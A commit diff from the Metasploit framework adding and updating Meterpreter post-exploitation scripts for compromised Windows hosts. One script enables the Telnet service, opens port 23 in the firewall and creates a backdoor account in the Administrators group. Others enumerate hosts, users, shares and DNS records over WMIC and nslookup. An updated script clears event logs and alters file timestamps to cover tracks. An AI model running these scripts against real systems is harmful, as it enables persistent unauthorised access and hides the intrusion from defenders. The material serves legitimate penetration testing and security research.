New scripts and updated scripts from Carlos Perez
git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
f927320eda
commit
e6ef0ab495
|
@ -0,0 +1,201 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Note: If the Telnet Server is not installed in Vista or win2k8
|
||||
# it will be installed.
|
||||
################## Variable Declarations ##################
|
||||
|
||||
session = client
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu." ],
|
||||
"-e" => [ false, "Enable Telnet Server only." ],
|
||||
"-p" => [ true, "The Password of the user to add." ],
|
||||
"-u" => [ true, "The Username of the user to add." ]
|
||||
)
|
||||
def checkifinst(session)
|
||||
r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
if d =~ (/TlntSvr/)
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def insttlntsrv(session)
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows Vista)/
|
||||
if checkifinst(session)
|
||||
print_status("Telnet Service Installed on Target")
|
||||
else
|
||||
print_status("Installing Telnet Server Service ......")
|
||||
session.response_timeout=90
|
||||
r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def enabletlntsrv(session)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr"
|
||||
root_key2, base_key2 = session.sys.registry.splitkey(key2)
|
||||
value2 = "Start"
|
||||
begin
|
||||
open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ)
|
||||
v2 = open_key.query_value(value2)
|
||||
print_status "Setting Telnet Server Services service startup mode"
|
||||
if v2.data != 2
|
||||
print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..."
|
||||
cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ]
|
||||
cmmds. each do |cmd|
|
||||
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
end
|
||||
else
|
||||
print_status "\tTelnet Server Services service is already set to auto"
|
||||
end
|
||||
#Enabling Exception on the Firewall
|
||||
print_status "\tOpening port in local firewall if necessary"
|
||||
r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def addrdpusr(session, username, password)
|
||||
tmpout = [ ]
|
||||
cmdout = []
|
||||
print_status "Setting user account for logon"
|
||||
print_status "\tAdding User: #{username} with Password: #{password}"
|
||||
begin
|
||||
r = session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group TelnetClients"
|
||||
r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "\tAdding User: #{username} to local group Administrators"
|
||||
r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
tmpout << d
|
||||
end
|
||||
cmdout << tmpout
|
||||
r.channel.close
|
||||
r.close
|
||||
print_status "You can now login with the created user"
|
||||
rescue::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
def message
|
||||
print_status "Windows Telnet Server Enabler Meterpreter Script"
|
||||
end
|
||||
def usage
|
||||
print(
|
||||
"Windows Telnet Server Enabler Meterpreter Script\n" +
|
||||
"Usage: getgui -u <username> -p <password> \n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
# Parsing of Options
|
||||
usr = nil
|
||||
pass = nil
|
||||
lport = nil
|
||||
enbl = nil
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-u"
|
||||
usr = val
|
||||
when "-p"
|
||||
pass = val
|
||||
when "-h"
|
||||
usage
|
||||
break
|
||||
when "-n"
|
||||
lport = val.to_i
|
||||
when "-e"
|
||||
enbl = 1
|
||||
end
|
||||
|
||||
}
|
||||
if enbl == 1
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
|
||||
elsif usr!= nil && pass != nil
|
||||
message
|
||||
insttlntsrv(session)
|
||||
enabletlntsrv(session)
|
||||
addrdpusr(session, usr, pass)
|
||||
|
||||
else
|
||||
usage
|
||||
end
|
||||
|
|
@ -4,7 +4,7 @@ require 'ftools'
|
|||
#Meterpreter script for ping sweeps on Windows 2003, Windows Vista
|
||||
#Windows 2008 and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Verion: 0.1.2
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
|
@ -15,7 +15,8 @@ require 'ftools'
|
|||
"-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"],
|
||||
"-hl" => [ true, "File with Host List for DNS Forward Lookup"],
|
||||
"-d" => [ true, "Domain Name for DNS Forward Lookup"],
|
||||
"-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"]
|
||||
"-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"],
|
||||
"-sr" => [ false, "To Perform Service Record DNS lookup for a domain"]
|
||||
|
||||
)
|
||||
session = client
|
||||
|
@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo
|
|||
def stdlookup(session,domain,dest)
|
||||
dest = dest + "-general-record-lookup.txt"
|
||||
print_status("Getting MX and NS Records for Domain #{domain}")
|
||||
filewrt(dest,"MX and NS Records for Domain #{domain}")
|
||||
filewrt(dest,"SOA, NS and MX Records for Domain #{domain}")
|
||||
types = ["SOA","NS","MX"]
|
||||
mxout = []
|
||||
results = []
|
||||
garbage = []
|
||||
types.each do |t|
|
||||
begin
|
||||
r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
mxout << d
|
||||
end
|
||||
|
@ -51,17 +54,19 @@ def stdlookup(session,domain,dest)
|
|||
r.close
|
||||
results = mxout.to_s.split(/\n/)
|
||||
results.each do |rec|
|
||||
if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/
|
||||
garbage << rec
|
||||
else
|
||||
print_status("\t#{rec}")
|
||||
filewrt(dest,"#{rec}")
|
||||
end
|
||||
if rec.match(/\s*internet\saddress\s\=\s/)
|
||||
garbage << rec.split(/\s*internet\saddress\s\=/)
|
||||
print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ")
|
||||
filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ")
|
||||
garbage.clear
|
||||
end
|
||||
garbage.clear
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_status("The following Error was encountered: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
|
@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest)
|
|||
end
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#Function for enumerating srv records
|
||||
def srvreclkp(session,domain,dest)
|
||||
dest = dest + "-srvenum.txt"
|
||||
srout = []
|
||||
garbage = []
|
||||
srvrcd = [
|
||||
"_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.",
|
||||
"_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.",
|
||||
"_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."]
|
||||
print_status("Performing SRV Record Enumeration for #{domain}")
|
||||
filewrt(dest,"SRV Record Enumeration for #{domain}")
|
||||
srvrcd.each do |srv|
|
||||
r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
srout << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
results = srout.to_s.split(/\n/)
|
||||
results.each do |rec|
|
||||
if rec.match(/\s*internet\saddress\s\=\s/)
|
||||
garbage << rec.split(/\s*internet\saddress\s\=/)
|
||||
print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
|
||||
filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}")
|
||||
garbage.clear
|
||||
end
|
||||
garbage.clear
|
||||
srout.clear
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
#Function to print message during run
|
||||
def message(dest)
|
||||
print_status "Network Enumerator Meterpreter Script "
|
||||
|
@ -231,10 +269,12 @@ frdlkp = nil
|
|||
dom = nil
|
||||
hostlist = nil
|
||||
helpcall = nil
|
||||
srvrc = nil
|
||||
# Parsing of Options
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
|
||||
when "-sr"
|
||||
srvrc = 1
|
||||
when "-rl"
|
||||
rvrslkp = 1
|
||||
when "-fl"
|
||||
|
@ -249,6 +289,7 @@ helpcall = nil
|
|||
hostlist = val
|
||||
when "-r"
|
||||
range = val
|
||||
|
||||
when "-h"
|
||||
print(
|
||||
"Network Enumerator Meterpreter Script\n" +
|
||||
|
@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1
|
|||
message(logs)
|
||||
frwdlp(session,hostlist,dom,dest)
|
||||
elsif dom != nil && stdlkp == 1
|
||||
message(logs)
|
||||
stdlookup(session,dom,dest)
|
||||
elsif dom != nil && srvrc == 1
|
||||
message(logs)
|
||||
srvreclkp(session,dom,dest)
|
||||
elsif helpcall == nil
|
||||
print(
|
||||
"Network Enumerator Meterpreter Script\n" +
|
||||
|
|
|
@ -0,0 +1,210 @@
|
|||
#!/usr/bin/env ruby
|
||||
#
|
||||
#Meterpreter script for basic enumeration of Windows 2003, Windows Vista
|
||||
# and Windows XP remote targets using native windows command wmic.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.1.1
|
||||
#Note:
|
||||
################## Variable Declarations ##################
|
||||
session = client
|
||||
# Variables for Options
|
||||
helpcall = 0
|
||||
rusr = nil
|
||||
rpass = nil
|
||||
trg = ""
|
||||
# Script Options
|
||||
@@exec_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help menu."],
|
||||
"-t" => [ true, "The target address"],
|
||||
"-u" => [ true, "User on the target system (If not provided it will use credential of process)"],
|
||||
"-p" => [ true, "Password of user on target system"]
|
||||
)
|
||||
|
||||
# Create Filename info to be appended to downloaded files
|
||||
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
||||
|
||||
# Create a directory for the logs
|
||||
logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum')
|
||||
|
||||
# Create the log directory
|
||||
::FileUtils.mkdir_p(logs)
|
||||
|
||||
# WMIC Commands that will be executed on the Target
|
||||
wmic = [
|
||||
'environment list',
|
||||
'share list',
|
||||
'nicconfig list',
|
||||
'computersystem list',
|
||||
'useraccount list',
|
||||
'group list',
|
||||
'sysaccount list',
|
||||
'volume list brief',
|
||||
'service list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'qfe list'
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
||||
# Function for running a list of WMIC commands stored in a array, returs string
|
||||
def wmicexec(session,wmic,user,pass,trgt)
|
||||
print_status("Running WMIC Commands ....")
|
||||
tmpout = ''
|
||||
command = nil
|
||||
runfail = 0
|
||||
runningas = session.sys.config.getuid
|
||||
begin
|
||||
tmp = session.fs.file.expand_path("%TEMP%")
|
||||
# Temporary file on windows host to store results
|
||||
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"
|
||||
|
||||
wmic.each do |wmi|
|
||||
if user == nil
|
||||
print_status("The commands will be ran under the credentials of #{runningas}")
|
||||
command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"
|
||||
else
|
||||
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"
|
||||
end
|
||||
print_status "\trunning command wimic #{wmi}"
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})
|
||||
sleep(1)
|
||||
#print_status "\twmic #{command}"
|
||||
r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})
|
||||
sleep(2)
|
||||
r.close
|
||||
end
|
||||
# Read the output file of the wmic commands
|
||||
wmioutfile = session.fs.file.new(wmicfl, "rb")
|
||||
until wmioutfile.eof?
|
||||
tmpout << wmioutfile.read
|
||||
end
|
||||
# Close output file in host
|
||||
wmioutfile.close
|
||||
rescue ::Exception => e
|
||||
print_status("Error running WMIC commands: #{e.class} #{e}")
|
||||
end
|
||||
# We delete the file with the wmic command output.
|
||||
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
|
||||
c.close
|
||||
tmpout
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
# Function for writing results of other functions to a file
|
||||
def filewrt(file2wrt, data2wrt)
|
||||
output = ::File.open(file2wrt, "a")
|
||||
data2wrt.each do |d|
|
||||
output.puts(d)
|
||||
end
|
||||
output.close
|
||||
end
|
||||
#------------------------------------------------------------------------------
|
||||
# Function to generate report header
|
||||
def headerbuid(session,target,dest)
|
||||
# Header for File that will hold all the output of the commands
|
||||
info = session.sys.config.sysinfo
|
||||
header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"
|
||||
header << "Running as: #{client.sys.config.getuid}\n"
|
||||
header << "From: #{info['Computer']}\n"
|
||||
header << "OS: #{info['OS']}\n"
|
||||
header << "Target: #{target}\n"
|
||||
header << "\n\n\n"
|
||||
|
||||
print_status("Saving report to #{dest}")
|
||||
header
|
||||
|
||||
end
|
||||
#------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#------------------------------------------------------------------------------
|
||||
# Function Help Message
|
||||
def helpmsg
|
||||
print(
|
||||
"Remote Windows Enumeration Meterpreter Script\n" +
|
||||
"This script will enumerate windows hosts in the target enviroment\n" +
|
||||
"given a username and password or using the credential under witch\n" +
|
||||
"Meterpeter is running using WMI wmic windows native tool.\n" +
|
||||
"Usage:\n" +
|
||||
@@exec_opts.usage
|
||||
)
|
||||
end
|
||||
################## MAIN ##################
|
||||
|
||||
localos = winver(session)
|
||||
|
||||
# Check that the command is not being ran on a Win2k host
|
||||
# since wmic is not present in Windows 2000
|
||||
if localos =~ /(Windows 2000)/
|
||||
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
|
||||
else
|
||||
# Parsing of Options
|
||||
@@exec_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
|
||||
when "-t"
|
||||
trg = val
|
||||
when "-u"
|
||||
rusr = val
|
||||
when "-p"
|
||||
rpass = val
|
||||
when "-h"
|
||||
helpmsg
|
||||
helpcall = 1
|
||||
end
|
||||
|
||||
}
|
||||
#logfile name
|
||||
dest = logs + "/" + trg + filenameinfo
|
||||
# Executing main logic of the script
|
||||
if helpcall == 0 and trg != ""
|
||||
|
||||
# Making sure that is running as System a Username and Password for target machine must be provided
|
||||
|
||||
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
|
||||
|
||||
print_status("Stopped: Running as System and no user provided for connecting to target!!")
|
||||
|
||||
else trg != nil && helpcall != 1
|
||||
|
||||
filewrt(dest,headerbuid(session,trg,dest))
|
||||
filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg))
|
||||
|
||||
end
|
||||
elsif helpcall == 0 and trg == ""
|
||||
|
||||
helpmsg
|
||||
end
|
||||
end
|
|
@ -3,7 +3,7 @@
|
|||
#Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista
|
||||
# and Windows XP targets using native windows commands.
|
||||
#Provided by Carlos Perez at carlos_perez[at]darkoperator.com
|
||||
#Verion: 0.3.2
|
||||
#Verion: 0.3.4
|
||||
#Note: Compleatly re-writen to make it modular and better error handling.
|
||||
# Working on adding more Virtual Machine Checks and looking at improving
|
||||
# the code but retain the independance of each module so it is easier for
|
||||
|
@ -33,13 +33,18 @@ commands = [
|
|||
'ipconfig /displaydns',
|
||||
'route print',
|
||||
'net view',
|
||||
'netstat -na',
|
||||
'netstat -nao',
|
||||
'netstat -vb',
|
||||
'netstat -ns',
|
||||
'net accounts',
|
||||
'net accounts /domain',
|
||||
'net session',
|
||||
'net share',
|
||||
'net group',
|
||||
'net user',
|
||||
'net localgroup',
|
||||
'net localgroup administrators',
|
||||
'net group administrators',
|
||||
'net view /domain',
|
||||
'netsh firewall show config',
|
||||
'tasklist /svc'
|
||||
|
@ -62,11 +67,12 @@ cmdstomp = [
|
|||
wmic = [
|
||||
'computersystem list',
|
||||
'useraccount list',
|
||||
'group',
|
||||
'group list',
|
||||
'service list brief',
|
||||
'volume list brief',
|
||||
'process list brief',
|
||||
'startup list full',
|
||||
'rdtoggle list',
|
||||
'qfe',
|
||||
]
|
||||
#Specific Commands for Windows vista for Wireless Enumeration
|
||||
|
@ -84,6 +90,12 @@ nonwin2kcmd = [
|
|||
'wbem\\wmic.exe',
|
||||
'netsh.exe',
|
||||
]
|
||||
# Executables not pressent in Windows 2000
|
||||
nowin2kexe = [
|
||||
'netsh.exe',
|
||||
'tasklist.exe',
|
||||
'wbem\\wmic.exe',
|
||||
]
|
||||
################## Function Declarations ##################
|
||||
|
||||
# Function to check if Target Machine a VM
|
||||
|
@ -357,7 +369,7 @@ end
|
|||
def covertracks(session,cmdstomp)
|
||||
clrevtlgs(session)
|
||||
info = session.sys.config.sysinfo
|
||||
trgtos = info['OS']
|
||||
trgtos = winver(session)
|
||||
if trgtos =~ /(Windows 2000)/
|
||||
chmace(session,cmdstomp - nonwin2kcmd)
|
||||
else
|
||||
|
@ -488,6 +500,36 @@ def killApp(session,procpid)
|
|||
session.sys.process.kill(procpid)
|
||||
print_status("Old process #{procpid} killed.")
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
def winver(session)
|
||||
stringtest = ""
|
||||
verout = []
|
||||
r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true})
|
||||
while(d = r.channel.read)
|
||||
stringtest << d
|
||||
end
|
||||
r.channel.close
|
||||
r.close
|
||||
|
||||
verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/)
|
||||
version = nil
|
||||
if verout[0] == "6"
|
||||
if verout[1] == "0"
|
||||
version = "Windows Vista/Windows 2008"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windpows 7"
|
||||
end
|
||||
elsif verout [0] == "5"
|
||||
if verout[1] == "0"
|
||||
version = "Windows 2000"
|
||||
elsif verout[1] == "1"
|
||||
version = "Windows XP"
|
||||
elsif verout[1] == "2"
|
||||
version = "Windows 2003"
|
||||
end
|
||||
end
|
||||
version
|
||||
end
|
||||
|
||||
#---------------------------------------------------------------------------------------------------------
|
||||
# Function to execute process migration
|
||||
|
@ -537,7 +579,7 @@ if helpopt != 1
|
|||
header << "Host: #{info['Computer']}\n"
|
||||
header << "OS: #{info['OS']}\n"
|
||||
header << "\n\n\n"
|
||||
trgtos = info['OS']
|
||||
trgtos = winver(session)
|
||||
print_status("Saving report to #{dest}")
|
||||
filewrt(dest,header)
|
||||
filewrt(dest,chkvm(session))
|
||||
|
@ -566,7 +608,11 @@ if helpopt != 1
|
|||
end
|
||||
if (cm != nil)
|
||||
filewrt(dest,"EventLogs where Cleared")
|
||||
covertracks(session,cmdstomp)
|
||||
if trgtos =~ /(Windows 2000)/
|
||||
covertracks(session,cmdstomp - nowin2kexe)
|
||||
else
|
||||
covertracks(session,cmdstomp)
|
||||
end
|
||||
end
|
||||
print_status("Done!")
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue